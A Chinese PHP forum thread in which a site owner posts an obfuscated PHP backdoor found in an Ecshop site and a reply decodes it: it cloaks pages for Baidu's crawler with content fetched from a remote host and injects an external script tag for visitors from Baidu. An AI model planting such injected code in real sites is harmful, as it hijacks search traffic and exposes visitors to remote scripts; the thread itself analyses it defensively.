Ecshop开源程序被植入的一段木马程序,求真相!

webeidolon 2012-02-10 09:38:51
开源建站容易成为黑客攻击对象,举个我发现的一个被攻击的网站(www.1985yy.com)例子,在百度输入框输入"site:www.1985yy.com".你会发现:
1.发现搜索结果很多垃圾内容,非原网站内容;
2.而打开搜索结果链接看到的又是正常内容;
3.无法使用百度快照;
4.在google等其它搜索引擎用site口令网站又显示正常。

我朋友的一个网站也中了类似的病毒,好不容易把木马病毒程序找出来了,但本人技术水平较低,病毒程序看得不是很明白,哪位朋友能注销解释下。
代码如下:


error_reporting(E_ERROR);
$dedeN="PHNjcmlwdCBzcmM9aHR0cDovL2MuZG5way5tZS46NzA1MC90di5odG0+PC9zY3JpcHQ+";
if(strpos(strtolower($_SERVER["HT"."TP_US"."E"."R_AG"."EN"."T"]),"aidu")){
echo file_get_contents(base64_decode('aHR0cDovL2IuZG5way5uZXQ6ODMzL3l4MS90di5hc3A='));
exit();}else if(stristr($_SERVER["H"."TT"."P_REF"."E"."RER"],"aidu")){
echo base64_decode($dedeN); }


热心的朋友请解释和编译下。
...全文
451 5 打赏 收藏 转发到动态 举报
写回复
用AI写文章
5 条回复
切换为时间正序
请发表友善的回复…
发表回复
webeidolon 2012-02-13
  • 打赏
  • 举报
回复
呵呵,自己搞错了
jlokys 2012-02-11
  • 打赏
  • 举报
回复
对,要删除。

而下面这一段 是百度统计代码,应该是你们自己加的(自己可以查下),这段不是黑客加的
<script type="text/javascript">
var _bdhmProtocol = (("https:" == document.location.protocol) ? " https://" : " http://");
document.write(unescape("%3Cscript src='" + _bdhmProtocol + "hm.baidu.com/h.js%3Fb72ab2d3720957a8c84e9d1b4e4224e5' type='text/javascript'%3E%3C/script%3E"));
</script>
webeidolon 2012-02-11
  • 打赏
  • 举报
回复
非常感谢,打开网站一个页面查看源代码呈现的一段,又如何解释;是不是把PHP源程序那一段删除了,木马就清除了?

<script type="text/javascript">
var _bdhmProtocol = (("https:" == document.location.protocol) ? " https://" : " http://");
document.write(unescape("%3Cscript src='" + _bdhmProtocol + "hm.baidu.com/h.js%3Fb72ab2d3720957a8c84e9d1b4e4224e5' type='text/javascript'%3E%3C/script%3E"));
</script>

[Quote=引用 3 楼 jlokys 的回复:]
从目前来看,主要是为了刷流量
[/Quote]
jlokys 2012-02-10
  • 打赏
  • 举报
回复
从目前来看,主要是为了刷流量
jlokys 2012-02-10
  • 打赏
  • 举报
回复
原理很好明白:
//下面字符串内容为:<script src=http://c.dnpk.me.:7050/tv.htm></script>
$dedeN="PHNjcmlwdCBzcmM9aHR0cDovL2MuZG5way5tZS46NzA1MC90di5odG0+PC9zY3JpcHQ+";
//下面if判断检查是否为百度爬虫,这样是,直接丢给爬虫的是其它网站的一个网页内容
if(strpos(strtolower($_SERVER["HT"."TP_US"."E"."R_AG"."EN"."T"]),"aidu")){
//file_get_contents 读取链接 http://b.dnpk.net:833/yx1/tv.asp 的内容
echo file_get_contents(base64_decode('aHR0cDovL2IuZG5way5uZXQ6ODMzL3l4MS90di5hc3A='));
//终止程序执行
exit();}
else if(stristr($_SERVER["H"."TT"."P_REF"."E"."RER"],"aidu")){
//如果从百度过来的链接:则你的网页中会包含:<script src=http://c.dnpk.me.:7050/tv.htm></script>
echo base64_decode($dedeN); }
搞支付宝手机支付接口搞了三天了,连支付宝的技术人员都没能帮我解决问题,在百度找了很多和我一样问题的,都无法解决。 主要问题就是,使用0001加密,返回值无法验证。 人不如己,我还是自己认真的阅读了下手册,仔细的分析下代码,终于把问题给解决了。 废话不多说,直接上菜。 1、本程序直接复制到你的根目录即可 (没有修改过ECSHOP核心文件的前提下) 2、/alipay/key/ 文件夹里有个两个文件alipay_public_key.pem (公钥) rsa_private_key.pem (私钥) 公钥和私钥的配置方法很简单,看手册会看晕的。我简化点说。 (1)打开 openssl(openssl生成工具 用完可删) 文件夹。运行这个文件夹下的 /bin/openssl.exe程序 (2)打开 openssl(openssl生成工具 用完可删) 文件夹下的 /bin/生成命令.txt (3)按照1、2、3的顺序,在OpenSSL.exe程序中运行。操作完成后。 你会发现 /bin 文件夹下面多了两个.pem文件 和 一个.txt的文件 (4)将rsa_public_key.pem 用记事本打开,将前缀和后缀之间的内容复制(即-----BEGIN PUBLIC KEY-----和-----END PUBLIC KEY----- 之间的内容) (5)进入支付宝签约管理,点击查看PID | Key 然后点击 无线产品密钥管理(wap专用) 查看 (6)点击RSA加密:添加密钥(或查看密钥) 将刚刚复制的内容粘贴到这个文本框内,记得一定要删除所有的空格,开头和结尾一定要不要有空格。点击保存(或修改) (7)完成后点击查看支付宝公钥,将里面的内容复制出来,粘贴到/alipay/key/alipay_public_key.pem 的文件里,格式已经在该文件里写的很清楚的。 (8)将刚刚生成的rsa_private_key.pem文件里的内容复制到/alipay/key/rsa_private_key.pem 里,注意格式。 3、完成后直接上传到网站根目录即可。 4、注意,本程序是直接覆盖alipay.php的,如果你想保留支付宝的网页支付插件,请慎用,建议新建一个手机网站使用。 本人并不是技术特别厉害的程序员,本程序经过N多测试均未发现问题,如果你无法正常使用,极有可能是你的公钥没有配置好,可以联系支付宝的技术教你弄弄。 如果你发现我写的代码有点冗余,请与我联系,我们共同完善。QQ:927822902 特别声明:本人平时特别忙,如果是想加QQ寻一对一解决问题的,请勿加。付费例外:)

20,359

社区成员

发帖
与我相关
我的任务
社区描述
“超文本预处理器”,是在服务器端执行的脚本语言,尤其适用于Web开发并可嵌入HTML中。PHP语法利用了C、Java和Perl,该语言的主要目标是允许web开发人员快速编写动态网页。
phpphpstorm 技术论坛(原bbs)
社区管理员
  • 开源资源社区
  • phpstory
  • xuzuning
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧